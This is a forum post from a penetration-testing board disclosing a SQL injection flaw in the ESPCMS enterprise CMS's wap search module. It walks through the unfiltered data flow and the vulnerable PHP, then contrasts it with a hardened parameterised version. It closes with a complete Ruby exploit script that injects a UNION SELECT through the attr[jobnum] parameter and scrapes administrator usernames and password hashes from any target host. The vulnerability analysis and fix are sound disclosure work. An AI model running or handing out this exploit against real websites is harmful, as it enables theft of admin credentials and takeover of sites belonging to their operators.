中国网络渗透测试联盟
Title:
SQL injection in the ESPCMS wap module search
Author:
admin
Posted:
2013-7-27 18:31
0×0 Vulnerability overview
0×1 Vulnerability details
0×2 PoC
0×0 Vulnerability overview
ESPCMS (易思ESPCMS企业网站管理系统) is an enterprise website management system built on the LAMP stack. It is marketed as simple to operate, feature-rich, stable, extensible and secure, and easy to customise and maintain, so that a professional corporate website can be set up quickly.

It handles certain incoming parameters carelessly, which leads to SQL injection.
0×1 Vulnerability details
The tainted data flows $_SERVER['QUERY_STRING'] -> $urlcode -> $output -> $value -> $db_where -> $sql -> mysql_query, and nothing along that path filters it; that is what makes the injection possible.

Because the variable is read from $_SERVER['QUERY_STRING'] rather than from $_GET, it bypasses the program's own input filtering entirely.

Moreover, the injected variable is the value of an array element, not its key, so the escaping that the loop applies to the key never touches it. Together these produce a fairly unusual SQL injection.
In the in_result function of /interface/3gwap_search.php:
function in_result() {
    ... ... ... ... ... ... ... ... ...
    // raw query string is used instead of the already-filtered $_GET
    $urlcode = $_SERVER['QUERY_STRING'];
    parse_str(html_entity_decode($urlcode), $output);
    ... ... ... ... ... ... ... ... ...
    if (is_array($output['attr']) && count($output['attr']) > 0) {
        $db_table = db_prefix . 'model_att';
        foreach ($output['attr'] as $key => $value) {
            if ($value) {
                // only the array key is escaped and checked against model_att
                $key = addslashes($key);
                $key = $this->fun->inputcodetrim($key);
                $db_att_where = " WHERE isclass=1 AND attrname='$key'";
                $countnum = $this->db_numrows($db_table, $db_att_where);
                if ($countnum > 0) {
                    // the array value goes into the WHERE clause unescaped
                    $db_where .= ' AND b.' . $key . '=\'' . $value . '\'';
                }
            }
        }
    }
    if (!empty($keyword) && empty($keyname)) {
        $keyname = 'title';
        $db_where .= " AND a.title like '%$keyword%'";
    } elseif (!empty($keyword) && !empty($keyname)) {
        $db_where .= " AND $keyname like '%$keyword%'";
    }
    $pagemax = 15;
    $pagesylte = 1;
    if ($countnum > 0) {
        $numpage = ceil($countnum / $pagemax);
    } else {
        $numpage = 1;
    }
    $sql = "SELECT b.*,a.* FROM " . db_prefix . "document AS a LEFT JOIN " . db_prefix . "document_attr AS b ON a.did=b.did " . $db_where . ' LIMIT 0,' . $pagemax;
    $this->htmlpage = new PageBotton($sql, $pagemax, $page, $countnum, $numpage, $pagesylte, $this->CON['file_fileex'], 5, $this->lng['pagebotton'], $this->lng['gopageurl'], 0);
    $sql = $this->htmlpage->PageSQL('a.did', 'down');
    $rs = $this->db->query($sql);
    ... ... ... ... ... ... ... ... ...
}
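To make the data flow concrete, here is an added example (my own code, not ESPCMS's) that models how in_result() assembles $db_where from attr[...] values, next to a hardened builder. The $KNOWN_ATTRS whitelist stands in for the db_numrows() lookup against model_att, and the query string is a constructed, shortened form of the PoC below; both are assumptions. The hardened version keeps the column-name whitelist, rejects non-string values, and binds the value as a parameter instead of splicing it into the SQL.

```php
<?php
// Added example, not ESPCMS code. Models the attr[...] handling of
// in_result() in /interface/3gwap_search.php and a hardened equivalent.

// Constructed query string, trimmed from the PoC in this post (assumption).
$QUERY_STRING = 'ac=search&at=result&keyword=1&keyname=a.title'
    . '&attr[jobnum]=1%27%20and%201=2%20UNION%20SELECT%201,2%20from%20espcms_admin_member;%23';

// Stand-in for the model_att lookup: attribute names that may become columns (assumption).
$KNOWN_ATTRS = ['jobnum' => true, 'city' => true];

// Vulnerable: mirrors the original. The key is escaped and whitelisted, the value is not.
function build_where_vulnerable(string $queryString, array $knownAttrs): string
{
    parse_str(html_entity_decode($queryString), $output);
    $db_where = '';
    if (isset($output['attr']) && is_array($output['attr'])) {
        foreach ($output['attr'] as $key => $value) {
            if ($value) {
                $key = addslashes($key);           // key is filtered ...
                if (isset($knownAttrs[$key])) {    // ... and checked, like the model_att query
                    // value is spliced in verbatim: a single quote ends the literal
                    $db_where .= ' AND b.' . $key . '=\'' . $value . '\'';
                }
            }
        }
    }
    return $db_where;
}

// Hardened: whitelist and shape-check the column name, bind the value as a parameter.
function build_where_hardened(string $queryString, array $knownAttrs): array
{
    parse_str(html_entity_decode($queryString), $output);
    $clauses = [];
    $params  = [];
    if (isset($output['attr']) && is_array($output['attr'])) {
        foreach ($output['attr'] as $key => $value) {
            if (!is_string($value) || $value === '') {
                continue;   // attr[x][]=... would arrive as an array; reject rather than cast
            }
            if (!isset($knownAttrs[$key]) || !preg_match('/^[A-Za-z_][A-Za-z0-9_]*$/', $key)) {
                continue;   // unknown or malformed column name
            }
            $clauses[] = 'b.' . $key . ' = ?';
            $params[]  = $value;   // travels separately from the SQL text
        }
    }
    $where = $clauses ? ' AND ' . implode(' AND ', $clauses) : '';
    return ['where' => $where, 'params' => $params];
}

echo "vulnerable clause:\n", build_where_vulnerable($QUERY_STRING, $KNOWN_ATTRS), "\n\n";

$hard = build_where_hardened($QUERY_STRING, $KNOWN_ATTRS);
echo "hardened clause:\n", $hard['where'], "\n";
print_r($hard['params']);

// Executing the hardened form with PDO (connection and db_prefix assumed):
// $stmt = $pdo->prepare('SELECT b.*,a.* FROM ' . db_prefix . 'document AS a LEFT JOIN '
//     . db_prefix . 'document_attr AS b ON a.did=b.did WHERE 1=1' . $hard['where'] . ' LIMIT 0,15');
// $stmt->execute($hard['params']);
```

Running it shows the vulnerable builder emitting the attacker's UNION as part of the WHERE clause, while the hardened builder emits only ` AND b.jobnum = ?` and hands the raw payload to the driver as a bound string, where it can no longer change the query structure. Note that addslashes() on the key alone would not have helped the value even if it were applied, since the real fix is to stop building SQL by concatenation.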
0×2 PoC
require "net/http"

# Send a plain GET and return the Net::HTTPResponse
def request(method, url)
  if method.eql?("get")
    uri = URI.parse(url)
    http = Net::HTTP.new(uri.host, uri.port)
    response = http.request(Net::HTTP::Get.new(uri.request_uri))
    return response
  end
end

doc =<<HERE
-------------------------------------------------------
Espcms Injection Exploit
Author:ztz
Blog: http://ztz.fuzzexp.org/
-------------------------------------------------------
HERE

usage =<<HERE
Usage: ruby #{$0} host port path
example: ruby #{$0} www.target.com 80 /
HERE

puts doc

if ARGV.length < 3
  puts usage
else
  $host = ARGV[0]
  $port = ARGV[1]
  $path = ARGV[2]

  puts "\nsend request..."

  # attr[jobnum] closes the quoted value, then UNION-selects 45 columns to match
  # the column count of SELECT b.*,a.*; column 26 carries username and password
  # from espcms_admin_member joined by CHAR(38) ('&'), and %23 ('#') comments out
  # the rest of the original query.
  url = "http://#{$host}:#{$port}#{$path}wap/index.php?ac=search&at=result&lng=cn&mid=3&tid=11&keyword=1&keyname=a.title&countnum=1&" +
        "attr[jobnum]=1%27%20and%201=2%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13" +
        ",14,15,16,17,18,19,20,21,22,23,24,25,concat%28username,CHAR%2838%29,password%29,27" +
        ",28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45%20from%20espcms_admin_member;%23"

  response = request("get", url)
  # the concatenated column comes back as username&<32-character password hash>
  result = response.body.scan(/\w+&\w{32}/)
  puts result
end
Welcome to 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2